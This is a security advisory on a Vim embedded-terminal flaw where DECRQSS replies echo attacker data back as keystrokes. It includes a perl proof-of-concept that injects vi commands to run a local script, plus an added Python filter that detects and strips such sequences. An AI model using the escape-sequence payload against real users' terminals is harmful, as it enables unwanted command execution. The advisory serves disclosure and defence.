Vim's embedded terminal allows injection via DECRQSS response in vim/vim
Jul 18th 2023
DECRQSS is a request to which the terminal replies with certain information about its settings. Various terminals have bugs where a piece of data from the request (i.e., data that the terminal receives) is echoed back in the reply. In some cases this is enough that, if untrusted data reaches the terminal, a command can be run against the user's wishes.
One example I found of a place where such injection could take place is less (https://www.openwall.com/lists/oss-security/2023/02/07/7), which is a common program for people to run in a terminal.
Proof of Concept
Do some setup:
```bash
HISTFILE=/dev/null
history -c
EDITOR=vi
set -o vi
echo 'printf "\e[31myou got owned"' > ./x && chmod +x ./x
perl -le'print "\eP\$q;v\e\\ \eP\$q d\$\e\\ \eP\$q d\$\e\\ \n \eP\$q.A\e\\ \eP\$q/x\e\\ \eP\$qxA \e\\ \eP\$q x\e\\ \eP\$q ZZ\e\\"'
```
We get something like:
```
dgl@dev4:~$ ; ./x
you got owned
```
This achieves code execution if the user uses the embedded terminal in Vim and happens to receive some attacker-controlled data.
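The injection above works because the DECRQSS request (DCS `$q` Pt ST) carries a Pt payload that a buggy terminal copies into its reply. As an added defensive example that is not part of the original advisory, the following Python scans untrusted bytes for DECRQSS requests and strips all terminal "string" controls (DCS, OSC, APC, PM, SOS) before the data reaches a tty, while leaving ordinary CSI sequences such as colours intact; the sample input is constructed.

```python
import re

# DECRQSS request = DCS '$q' Pt ST. DCS is ESC P (7-bit) or 0x90 (8-bit C1);
# ST is ESC \ or 0x9C. The terminal answers DCS 1 '$r' ... ST, and the bug
# class in the advisory is a terminal that copies Pt into that answer, so Pt
# becomes keystrokes for whatever program is reading the tty.
DCS = rb"(?:\x1bP|\x90)"
ST = rb"(?:\x1b\\|\x9c)"
DECRQSS_RE = re.compile(DCS + rb"\$q(?P<pt>[^\x1b\x9c]*)" + ST)

# Any string control (DCS, OSC, APC, PM, SOS) can carry a payload to the
# terminal; BEL is also accepted as an OSC terminator by xterm-like terminals.
STRING_CTRL_RE = re.compile(
    rb"(?:\x1b[P\]_^X]|[\x90\x9d\x9f\x9e\x98]).*?(?:\x1b\\|\x9c|\x07)",
    re.DOTALL,
)


def find_decrqss(data: bytes):
    """Return the Pt payload of every DECRQSS request found in data."""
    return [m.group("pt") for m in DECRQSS_RE.finditer(data)]


def strip_string_controls(data: bytes) -> bytes:
    """Remove every DCS/OSC/APC/PM/SOS string; plain CSI (colours) is kept."""
    return STRING_CTRL_RE.sub(b"", data)


# Constructed sample: the advisory's first two requests (one in 7-bit form,
# one in 8-bit C1 form) embedded in otherwise harmless coloured text.
SAMPLE = b"log line \x1bP$q;v\x1b\\ and \x90$q d$\x9c \x1b[31mred\x1b[0m"

if __name__ == "__main__":
    for pt in find_decrqss(SAMPLE):
        print("DECRQSS request with Pt =", pt)
    print(strip_string_controls(SAMPLE))
```

An unterminated string control is left untouched by the stripper, so a stricter filter for log viewers or pagers should also drop a bare DCS/OSC introducer that never reaches ST.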